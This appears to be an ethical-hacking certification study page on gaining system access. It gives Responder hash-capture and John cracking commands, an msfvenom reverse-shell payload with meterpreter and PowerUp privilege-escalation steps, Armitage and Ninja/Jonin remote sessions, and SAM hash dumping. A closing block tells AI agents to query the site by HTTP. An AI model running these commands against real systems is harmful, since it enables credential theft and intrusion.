# 1. Gain access to the system ## 1. Perform Active Online Attack to Crack the System’s Password using Responder

LLMNR is layer 2 UDP 5355. netbios-ns port 137

LLMNR (link local multicast name resolution) and NBT-NS (netbios namer service) are used to performe name resolution on the local link. Responder is LLMNR, NBT-NS, MDNS poisoner. By default the tool only responds to SMB. check the interfaces ``` ifconfig ``` Now run responder on the interface. ``` sudo responder -I ens33 ``` Now when a user on the LAN try to access the unavailable share, responder will capture the hash.

logs are stored in /usr/share/responder folder. We will have a hash. Now crack it with John. on ubuntu you can install john as ``` sudo snap install john-the-ripper sudo john /home/ubuntu/Responder/logs/SMB-NTLMv2-SSP-10.10.10.10.txt ``` ## 2. Audit system passwords using Lophtcrack windows tool. Can crack other password on remote machine if you know a single account utilizing SMB. Use password auditing. use password auditing wizard. {% embed url="" %} ## 3. Find Vulnerabilities on exploit sites {% embed url="" %} ## 4. Gain Access to a Remote System using Reverse Shell Generator create msfvenom payload ``` msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x64 LHOST= LPORT= -f exe > shell-x86.ex ``` using apache to transfer the file ``` mkdir /var/www/html/share chmod -R 755 /var/www/html/share chmod -R www-data:www-data /var/www/html/share service apche2 start ``` Now run msfconsole ``` msfconsole use exploit/multi/handler ``` set the payload type, port and IP and visit the IP to download the executable. Run it you will get the shell You can run the following commands in meterpreter. ``` sysinfo //get system information ``` upload file through meterpreter the powersploit priv escaltion script./usr/share/windows-resources/powersploit ``` upload PowerUp.ps1 powerup.ps1 ``` Now get shell ``` shell ``` Now execute the script ``` powershell -ExecutionPolicy bypass -command ". .\powerup.ps1;invoke-All-Checks" ``` Now exit it and to get a VNC from meterpreter use the following command. ``` run vnc ``` {% embed url="" %} Also try different shells from rev shells {% endembed %} ## 5. Gain access to a system using armitage GUI based msf ``` service postgresql start ``` Now run armitage from Applications menu. Run intense scan. and then we can create a payload according to our target.

Once the victim opens the payload, we get the session. ## 6. Gain access to system using Ninja Jonin Ninja is installed on target and Jonin on attacker machine. {% embed url="" %} We need to edit its config file to change the ip and port.

Open the Jonin listenere. it will catch the sessions. ``` list //to list all sessions connect 1 //to connect to session //to get to cmd change cmd help //displays help ``` ## 7. Buffer Overflow {% embed url="" %} {% embed url="" %} Follow the detailed tutorial {% endembed %} **Tools required** {% embed url="" %} {% embed url="" %} ## 8. System Password hacking ``` # To Dump Windows SAM file hashes pwDump7.exe> hashes.txt ``` ### CEH V13 Practical Preparation Course {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ceh-practical.cavementech.com/module-6.-system-hacking/1.-gain-access-to-the-system.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.